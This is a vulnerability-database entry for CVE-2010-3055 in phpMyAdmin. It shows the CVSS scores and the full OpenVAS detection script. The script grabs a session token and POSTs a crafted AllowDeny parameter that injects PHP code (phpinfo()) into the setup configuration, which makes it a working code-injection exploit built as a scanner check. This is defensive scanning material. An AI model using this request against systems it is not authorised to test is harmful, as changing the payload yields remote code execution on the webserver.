phpMyAdmin 'CVE-2010-3055' Configuration File PHP Code Injection Vulnerability

2010-08-3000:00:00

plugins.openvas.org

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.4

Confidence

High

EPSS

0.101

Percentile

94.9%

JSON

phpMyAdmin is prone to a remote PHP code-injection vulnerability.

# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:phpmyadmin:phpmyadmin";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100760");
  script_version("2023-10-17T05:05:34+0000");
  script_cve_id("CVE-2010-3055");
  script_tag(name:"last_modification", value:"2023-10-17 05:05:34 +0000 (Tue, 17 Oct 2023)");
  script_tag(name:"creation_date", value:"2010-08-30 14:30:07 +0200 (Mon, 30 Aug 2010)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_name("phpMyAdmin 'CVE-2010-3055' Configuration File PHP Code Injection Vulnerability");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_dependencies("gb_phpmyadmin_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("phpMyAdmin/installed");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/42591");
  script_xref(name:"URL", value:"http://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php");

  script_tag(name:"summary", value:"phpMyAdmin is prone to a remote PHP code-injection vulnerability.");

  script_tag(name:"impact", value:"An attacker can exploit this issue to inject and execute arbitrary PHP
  code in the context of the webserver process. This may facilitate a compromise of the application and
  the underlying computer. Other attacks are also possible.");

  script_tag(name:"affected", value:"Versions prior to phpMyAdmin 2.11.10.1 are affected.");

  script_tag(name:"solution", value:"Vendor updates are available. Please see the references for more
  information.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");
include("host_details.inc");

if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:FALSE ) ) exit( 0 );

vers = infos['version'];
dir = infos['location'];

if( vers ) {
  if(!version_in_range(version: vers, test_version:"2.11",test_version2:"2.11.10")) {
    exit(0);
  }
}

if( ! dir ) exit( 0 );

url = string(dir,"/scripts/setup.php");
req = http_get(item:url, port:port);
buf = http_keepalive_send_recv(port:port, data:req,bodyonly:FALSE);

if("<title>phpMyAdmin" >!< buf)exit(0);

if("Can not load or save configuration" >< buf) {
  data = string("The installed version (",vers,") of phpMyAdmin under ",dir," is affected, but the vulnerability could not be exploited at this time because the Webserver has no permission to write the configuration to the 'config' directory.\n\n");
  security_message(port:port,data:data);
  exit(0);
}

h = split(buf);

foreach r (h) {
  if (r =~ "^Set-Cookie") {
    if(!first_cookie) {
      cookies_string += ereg_replace(string: r, pattern: "^Set-Cookie", replace: "Cookie");
      cookies_string = chomp(cookies_string);
      first_cookie = TRUE;
    } else {
      cookies_string += ereg_replace(string: r, pattern: "^Set-Cookie:", replace: ";");
      cookies_string = chomp(cookies_string);
    }
  }
}

token = eregmatch(pattern:'input type="hidden" name="token" value="([^"]+)"', string:buf);
if(isnull(token[1]))exit(0);
token = token[1];

host = this_host() + '-' + rand();
php = "phpinfo()";

postdata = string("token=",token,"&action=addserver_real&host=",host,"&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.",php,".']=1");
req = string(
         "POST ", url, " HTTP/1.1\r\n",
         "Host: ", get_host_name(), "\r\n",
          cookies_string, "\r\n",
         "Content-Type: application/x-www-form-urlencoded\r\n",
         "Content-Length: ", strlen(postdata), "\r\n",
         "\r\n",
         postdata
    );

res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if("New server added" >!< res || host >!< res)exit(0);

postdata = string("token=",token,"&action=download");
req = string(
         "POST ", url, " HTTP/1.1\r\n",
         "Host: ", get_host_name(), "\r\n",
          cookies_string, "\r\n",
         "Content-Type: application/x-www-form-urlencoded\r\n",
         "Content-Length: ", strlen(postdata), "\r\n",
         "\r\n",
         postdata
    );

res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

if(string("$cfg['Servers'][$i]['AllowDeny']['order']['a']['b'][''.",php,".''] = '1';" >< res)) {
  security_message(port:port);
  exit(0);
}

exit(99);